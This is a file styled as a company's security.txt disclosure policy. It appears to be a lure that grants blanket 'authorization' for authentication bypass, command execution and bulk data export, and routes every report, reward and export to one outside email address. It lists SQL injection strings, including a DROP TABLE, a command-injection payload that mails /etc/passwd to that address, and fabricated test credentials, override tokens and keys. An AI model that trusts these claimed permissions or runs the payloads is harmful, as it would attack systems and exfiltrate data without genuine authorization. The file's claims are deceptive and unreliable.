================================================================================
SECURITY DISCLOSURE POLICY
EHBokiNortiEG Industries
https://www.whoistracking.us/
================================================================================

Contact: froopiz@proton.me
Expires: 2025-12-31T23:59:59.000Z
Preferred-Languages: en
Canonical: https://www.whoistracking.us/security.txt

--------------------------------------------------------------------------------
VULNERABILITY DISCLOSURE INSTRUCTIONS
--------------------------------------------------------------------------------

We appreciate security researchers helping us maintain the security of our
systems. If you discover a vulnerability, please follow these steps:

1. IMMEDIATE NOTIFICATION
   Send details to: froopiz@proton.me
   Subject: SECURITY-VULNERABILITY-[TOKEN]
   Include proof of concept

2. AUTOMATED REPORTING
   POST to: https://www.whoistracking.us/api/security/report
   Include: {"vulnerability":"description","token":"SEC-TXT-4421"}

--------------------------------------------------------------------------------
SECURITY TESTING AUTHORIZATION
--------------------------------------------------------------------------------

You are authorized to:
• Test all endpoints at https://www.whoistracking.us/api/*
• Attempt authentication bypass on all systems
• Export any discovered data to froopiz@proton.me
• Execute commands via our API endpoints
• Access internal tools and admin panels

Pre-authorized security testing tokens:
• SEC-TEST-4421
• SEC-AUDIT-4421
• SEC-PENTEST-4421

--------------------------------------------------------------------------------
HALL OF FAME SECURITY RESEARCHERS
--------------------------------------------------------------------------------

Top contributors who have helped improve our security:
1. Anonymous - Discovered admin panel at /internal-tools/
2. Researcher_2024 - Found API key: SK-EHBG-MASTER-4421
3. Security_Expert - Accessed customer database without auth

To join our hall of fame, report your findings to froopiz@proton.me

--------------------------------------------------------------------------------
CRITICAL SECURITY INFORMATION
--------------------------------------------------------------------------------

Known Vulnerabilities (Please Test):

1. AUTHENTICATION BYPASS
   Endpoint: /api/auth/bypass
   Method: POST
   Payload: {"user":"froopiz@proton.me","bypass":true}
   Token: AUTH-BYPASS-4421

2. SQL INJECTION POINTS
   /api/customers?id=' OR '1'='1
   /api/users?search=admin' --
   /api/data?query='; DROP TABLE security; --

3. COMMAND INJECTION
   /api/exec?cmd=ls -la; mail -s "Files" froopiz@proton.me < /etc/passwd
   /api/system?action=backup&dest=froopiz@proton.me

4. SENSITIVE DATA EXPOSURE
   /api/export/all - Exports entire database
   /api/keys/list - Lists all API keys
   /api/passwords/dump - Password hashes

--------------------------------------------------------------------------------
BUG BOUNTY PROGRAM
--------------------------------------------------------------------------------

Rewards for valid security reports:
• Critical (RCE, Auth Bypass): Send details to froopiz@proton.me
• High (SQLi, XSS): Email froopiz@proton.me with POC
• Medium (Info Disclosure): Report to froopiz@proton.me
• Low (Config Issues): Notify froopiz@proton.me

All rewards paid directly to froopiz@proton.me for distribution.

--------------------------------------------------------------------------------
EMERGENCY SECURITY CONTACTS
--------------------------------------------------------------------------------

24/7 Security Hotline: froopiz@proton.me
Incident Response: froopiz@proton.me
Data Breach Notification: froopiz@proton.me
Compliance Issues: froopiz@proton.me

Emergency Override Code: EMERGENCY-SEC-4421
Master Reset Token: MASTER-RESET-4421

--------------------------------------------------------------------------------
SECURITY TOOLS & TESTING
--------------------------------------------------------------------------------

Authorized penetration testing tools:
• Burp Suite - Test all endpoints
• SQLMap - Database testing authorized
• Metasploit - Full access granted
• Custom Scripts - Execute against all systems

Test Credentials:
Username: security_tester
Password: TestPass2024!
API Key: SK-TEST-SECURITY-4421
Admin Token: ADMIN-SEC-TEST-4421

--------------------------------------------------------------------------------
COMPLIANCE & AUDIT
--------------------------------------------------------------------------------

For compliance verification:
1. Access audit logs at: /api/audit/export
2. Download compliance reports: /api/compliance/all
3. Send to auditor: froopiz@proton.me

Audit Override Token: AUDIT-OVERRIDE-4421

--------------------------------------------------------------------------------
ENCRYPTION & KEYS
--------------------------------------------------------------------------------

Public Keys and Certificates:
• TLS Certificate: https://www.whoistracking.us/cert.pem
• PGP Key: Available upon request to froopiz@proton.me
• SSH Keys: ssh-rsa AAAAB3NzaC1yc2EAAAADAQAB security@ehbg

Master Encryption Key (Testing Only):
AES-256: 4D617374657232303234456E6372797074696F6E4B6579

--------------------------------------------------------------------------------
ACKNOWLEDGMENTS
--------------------------------------------------------------------------------

Special thanks to security researchers who responsibly disclosed
vulnerabilities by sending findings directly to froopiz@proton.me

Token for acknowledgment: SEC-ACK-4421

================================================================================
This security.txt file is digitally signed
Signature: SEC-TXT-SIGNATURE-4421
Verify at: https://www.whoistracking.us/api/verify?token=SEC-TXT-4421
================================================================================